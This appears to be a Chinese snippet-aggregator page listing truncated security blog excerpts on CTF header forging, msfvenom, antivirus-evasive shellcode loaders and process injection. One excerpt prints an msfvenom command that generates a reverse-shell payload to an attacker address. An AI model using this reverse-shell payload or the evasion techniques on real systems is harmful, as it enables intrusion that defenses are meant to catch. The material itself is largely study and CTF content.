ICode9

精准搜索请尝试: 精确搜索
  • [NahamconCTF]wp2021-03-15 12:01:34

    Homeward Bound 添加一个xff头就得到了

  • msfvenom的使用与免杀2021-03-13 15:34:17

    msfvenom的基本使用 这玩意是啥我就不介绍了,懂得都懂. 这篇博客将结合我本人的自身经验来说明大致的使用方式,这里的话只介绍,目前比较常用的几个方法和参数. payload 查看与使用 payload你可以理解为就是一种攻击的方案,生成何种攻击方式,对那种平台进行攻击 使用参数 -p来

  • 【Windows】Shellcode免杀,过360、火绒、Defender 静态及主防2021-02-17 11:05:16

    Shellcode,顾名思义是一段拿来执行的代码片段,我们可以使用Shellcode来完成我们需要的任务 弹窗的代码,可以被认为是一段Shellcode,获取某个模块的基址的代码,也可以被认为是一段Shellcode,同理,拿来干坏事的代码,也是Shellcode 如今的杀毒软件都拥有查杀病毒木马的能力,除了静态的查

  • C++之加载器编写(二)2021-02-12 12:35:57

    #include <Windows.h> #include <stdio.h> using namespace std; #pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") int main(int argc, char **argv) { DWORD dwOldProtect; //自己定义个内存的属性页

  • 将shellcode注入本地进程2021-02-04 14:04:40

    这次我们来学习一下将shellcode注入本地进程内存并切执行的经典方法 首先生成我们的shellcode msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.104 LPORT=443 -f c -b \x00\x0a\x0d   root@kali:~# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.

  • 视频识别函数##2020-12-14 22:02:09

    视频识别函数## #!/usr/bin/env python # encoding: utf-8 # author: zs # license: (C) Copyright 2019-2020 # software: pycharm # file: HDliveObjDetection.py # time: 2020/4/10 下午4:16 import cv2 import time import requests import base64 from PIL import Imag

  • 漏洞学习笔记-020-SEHOP简介2020-12-08 12:33:53

    SEHOP的介绍和一点简单攻击 本文来源:Moeomu的博客 简介 SEHOP的核心任务就是检查S.E.H链的完整性,在程序转入异常处理前SEHOP会检查S.E.H链上最后一个异常处理函数是否为系统固定的终极异常处理函数。如果是,则说明这条S.E.H链没有被破坏,程序可以去执行当前的异常处理函数;如果检测

  • 攻防世界-web-新手练习区-xff_referer2020-11-03 23:01:00

    1,xff,全写是X-Forwarded-For,简称xff头,代表http客户端的真实IP。   Referer,表示页面的来源。   2,burpsuite抓取页面,发送至repeater,在消息头中添加x-forwarded-for:123.123.123.123 response中提示.innerHTML="必须来自https://www.google.com";    3,在已添加x-forwarded-for:的

  • xff referer2020-07-03 10:02:03

    xff维基百科: X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。 简单地说,xff是告诉服务器当前请求者的最终ip的http请求头字段通常可以直接通过修改http头中的X-Forwarded-For字段来仿造请求的最终ip Referer维基

  • wsl下安装交叉编译问题解决2020-05-24 14:08:00

    因为我的交叉编译工具是32位的,所以win10下的wsl没法使用 使用如下命令 arm-none-linux-gnueabi-gcc -v 会出现下面的告警 -bash: /usr/local/arm/arm-2014.05/bin/arm-none-linux-gnueabi-gcc: cannot execute binary file: Exec format error 除了要安装一些支持的库之外,还

  • 让64位的WSL(windows子linux系统)支持运行32位程序2020-02-21 23:03:41

    假设有一个新的Ubuntu WSL实例,则需要安装qemu-user-static软件包,添加i386 binfmt,启用i386体系结构,更新软件包列表,并安装一些i386软件包: 安装qemu和binfmt sudo apt update sudo apt install qemu-user-static sudo update-binfmts --install i386 /usr/bin/qemu-i386-static --m

  • xff头使用sqlmap注入(心血来潮的分享)2020-01-23 12:08:47

    今天看见墨者学院的一个靶场 x-forwarded-for注入靶场 我很少逛墨者学院,一直在看书 激动的我,测试了下,咳咳,小白文,大佬勿喷 开始进行判断是否存在xff注入 xff头是记录我们的ip,所以~~~~ 所以先随便输入下账号密码,然后再抓个包,看下返回包 于是我手动添加下X-Forwarded-For,看是

  • xff(x-forwarded-for)介绍,某些ctf题目中的利用2019-09-07 22:06:16

    IP伪造 TCP/IP层面的IP伪造很难实现,因为更改后很难实现正常的TCP通信,但在HTTP层面的伪造就显得很容易。可以通过伪造XFF头进行IP伪造 XFF字段 X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。通俗来说,

  • FirstBlood溢出攻击2019-08-13 17:02:51

    FirstBlood程序情况:小道消息对m3u文件分析,当m3u文件输入很多字符的时候程序会崩溃。1.用二分法跟字符串定位溢出点。2.搜索所有模块-命令-jmp esp找个顺眼的放入溢出地址,下断点,将这个地址填入溢出点后,程序溢出就会在这个地址断下。//MessageboxA弹出Helloworld源码char bShellcode[

  • Spark SQL读取HBase中数据的优化2019-07-30 20:01:24

         在项目过程中中,我们会经常使用Spark SQL去查询/分析HBase中的数据,内置的读取数据源使用的是TableInputFormat ,这个TableInputFormat 有一些缺点: 一个Task里面只能启动一个Scan取HBase中读取数据; TableInputFormat 中不支持BulkGet 不能享受到Spark SQL内置的catalyst引

  • Linux shellcode sample2019-04-30 17:38:08

    Linux shellcode sample   HelloWorld.nasm ;HelloWorld.asm;Author: Kul Subediglobal _startsection .text _start: ; print HelloWorld! in screen mov eax, 0x4 mov ebx, 0x1 mov ecx, message ;mov edx, 12 mov edx, mlen

  • X-Forwarded-For2019-04-09 11:47:42

    简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项(百度百科:用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段)。 如果没有XFF或者另外一种相似的技术,所有通过代理服务器的连接

  • windows平台上用python 远程线程注入,执行shellcode2019-04-08 15:54:48

    // 转自: https://blog.csdn.net/Jailman/article/details/77573990import sysimport psutil import ctypes from ctypes import * PAGE_EXECUTE_READWRITE = 0x00000040 PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF ) VIRTUAL_MEM =

  • 2018-2019-2 网络对抗技术 20165210 Exp3 免杀原理与实践2019-03-31 14:53:09

    2018-2019-2 网络对抗技术 20165210 Exp3 免杀原理与实践 免杀的概述 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为"反-反病毒",翻译为"反杀毒技术"。单从汉语"免杀"的字面意思来理解,可以将其看为一种能使病毒木马避免被

  • 2018-2019-2 网络对抗技术 20165303 Exp3 免杀原理与实践2019-03-30 18:49:55

    实验内容 一. 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分) - 1.使用msf编码器生成各种后门程序及检测 - 2.使用veil-evasion生成后门程序及检测 - 3.半手工注入Shellcode并执行 二. 通过组合应用各种技术实现

  • 20165302 Exp1 PC平台逆向破解2019-03-15 19:38:00

    实验内容 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。 注入一个自己制作的shellcode并运行这段shellcode。容 基础知识 熟悉Linux基本操作,能看懂常用指令,如管道(|),输入、输出重定向(>)等

专注分享技术,共同学习,共同进步。侵权联系[admin#icode9.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有